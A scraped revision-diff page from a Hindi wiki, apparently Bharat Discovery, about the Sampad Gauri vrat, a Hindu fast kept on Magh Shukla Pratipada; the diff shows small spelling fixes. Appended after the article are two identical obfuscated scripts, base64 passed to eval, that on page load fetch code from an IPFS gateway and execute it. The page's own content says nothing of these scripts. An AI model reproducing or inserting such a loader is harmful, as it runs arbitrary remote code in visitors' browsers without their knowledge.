Difference between revisions of "सम्पदगौरी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - "उल्लखित" to "उल्लिखित")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[माघ]] [[शुक्ल पक्ष]] की [[प्रतिपदा]] पर सम्पद् गौरीव्रत किया जाता है।
 
*[[माघ]] [[शुक्ल पक्ष]] की [[प्रतिपदा]] पर सम्पद् गौरीव्रत किया जाता है।
 
*सम्पद् गौरी व्रत [[कुम्भ]] मास में सभी विवाहित एवं अविवाहित नारियों के लिए होता है।
 
*सम्पद् गौरी व्रत [[कुम्भ]] मास में सभी विवाहित एवं अविवाहित नारियों के लिए होता है।
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Latest revision as of 18:51, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • magh shukl paksh ki pratipada par sampadh gaurivrat kiya jata hai.
  • sampadh gauri vrat kumbh mas mean sabhi vivahit evan avivahit nariyoan ke lie hota hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>